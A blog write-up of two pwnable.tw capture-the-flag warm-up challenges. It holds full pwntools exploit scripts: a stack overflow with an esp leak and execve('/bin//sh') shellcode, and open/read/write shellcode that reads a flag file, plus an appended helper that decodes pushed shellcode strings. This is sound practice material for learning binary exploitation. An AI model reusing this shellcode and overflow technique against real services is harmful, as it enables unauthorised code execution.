Pwnable.tw warm-up exercises

A bit of pwn practice... aiming to become an all-round player like Kunkun...

start

For this challenge we start by reversing the binary, and find that 20 characters of input followed by a newline are enough to overwrite esp. So we drive the interaction with pwntools. Note one detail in the middle of the code: the stack address gets moved into rcx, so if we make the program write rcx out we obtain the esp address. After that we just craft a payload and send it up.

from pwn import *

address = "chall.pwnable.tw"
port = 10000

# 21-byte x86 execve("/bin//sh") shellcode
shellcode = b"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# Address of the write() call inside the binary; returning here makes the program
# write out the stack contents, which leaks the current esp value
gad = 0x8048087
print(p32(gad))

console = remote(address, port)
print(console.recv())  # banner
# 20 bytes of padding, then the address that ret will jump to
payload = ('a' * 20).encode('utf-8') + p32(gad)
console.send(payload)
leak = u32(console.recv(4))  # first 4 bytes written back are the leaked esp
print(hex(leak))
# Second round: return into the stack buffer (leak + 0x18), where a short NOP
# sled is followed by the shellcode
payload = ('a' * 20).encode('utf-8') + p32(leak + 0x18) + b'\x90' * 4 + shellcode
console.send(payload)
console.interactive('root@start# ')

orw

Reverse the binary in IDA and take a look.
The entry of main is at 0x08048548; set a breakpoint there.
Single-stepping shows that the input value is stored at the address held in eax, which is then called directly.
So all we need is a shellcode that reads the file directly.
Find a tutorial or writeup and it is easy to learn; the Linux x86 syscall table is at
http://syscalls.kernelgrok.com/

from pwn import *

address = "chall.pwnable.tw"
port = 10001
# open(path, O_RDONLY, 0): eax=5 (open), ebx=path on the stack, ecx=0, edx=0.
# The four pushes build the NUL-terminated path string on the stack, last chunk first.
open_shellcode = "xor ecx,ecx;xor edx,edx;mov eax,0x5;push 0x00006761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f;mov ebx,esp;int 0x80;"
# read(fd, buf, 0x40): eax=3 (read); the path buffer on the stack is reused as buf.
# ebx=3 assumes the opened file received fd 3 (0-2 are stdin/stdout/stderr).
read_shellcode = "mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x40;int 0x80;"
# write(1, buf, 0x40): eax=4 (write), ebx=1 (stdout); ecx still points at buf.
write_shellcode = "mov eax,0x4;mov ebx,0x1;mov edx,0x40;int 0x80;"
shellcode = open_shellcode + read_shellcode + write_shellcode
payload = asm(shellcode)  # pwntools defaults to i386 here
io = remote(address, port)
io.recvuntil("shellcode:")
io.sendline(payload)
print(io.recv())
io.interactive('root@orw# ')
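When reviewing shellcode like the two blobs above, the first thing an analyst wants is the string it builds on the stack with `push imm32`. The following is an added example (not part of the original post) that reconstructs those strings from the start shellcode bytes and from the push constants of the orw shellcode; the opcode length table is a hand-written assumption that covers only the instructions present in these two shellcodes, not a general x86 decoder.

```python
import struct

# Minimal x86-32 length decoder covering only the opcodes used by the two
# shellcodes on this page (assumed fixed forms, no general ModRM/SIB handling).
# Opcode byte -> total instruction length in bytes.
_FIXED_LEN = {
    0x31: 2,  # xor r/m32, r32   (31 c9 = xor ecx, ecx)
    0xf7: 2,  # mul/div group    (f7 e1 = mul ecx)
    0xb0: 2,  # mov al, imm8     (b0 0b = mov al, 0xb)
    0x51: 1,  # push ecx
    0x68: 5,  # push imm32
    0x89: 2,  # mov r/m32, r32   (89 e3 = mov ebx, esp)
    0xcd: 2,  # int imm8         (cd 80 = int 0x80)
}

def extract_push_immediates(code):
    """Walk the shellcode instruction by instruction and collect every
    push imm32 operand in execution order. A byte-wise search for 0x68
    would misfire: the 'h' inside "//sh" is also the byte 0x68."""
    pushes, i = [], 0
    while i < len(code):
        op = code[i]
        if op not in _FIXED_LEN:
            raise ValueError("unsupported opcode 0x%02x at offset %d" % (op, i))
        if op == 0x68:
            pushes.append(struct.unpack_from("<I", code, i + 1)[0])
        i += _FIXED_LEN[op]
    return pushes

def decode_pushed_string(immediates):
    """The stack grows downward, so the LAST dword pushed sits at the LOWEST
    address: reverse the push order, then lay each dword out little-endian.
    The string ends at the first NUL, as the kernel's path parser sees it."""
    raw = b"".join(struct.pack("<I", imm) for imm in reversed(immediates))
    return raw.split(b"\x00", 1)[0].decode("ascii")

# Bytes copied from the start script above.
START_SHELLCODE = b"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# Push operands copied from open_shellcode in the orw script above, in push order.
ORW_PUSHES = [0x00006761, 0x6c662f77, 0x726f2f65, 0x6d6f682f]

if __name__ == "__main__":
    print(decode_pushed_string(extract_push_immediates(START_SHELLCODE)))  # /bin//sh
    print(decode_pushed_string(ORW_PUSHES))  # /home/orw/flag
```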

Author: John Doe, posted on October 26, 2019
http://hexo.init-new-world.com/pwnable-tw-exercise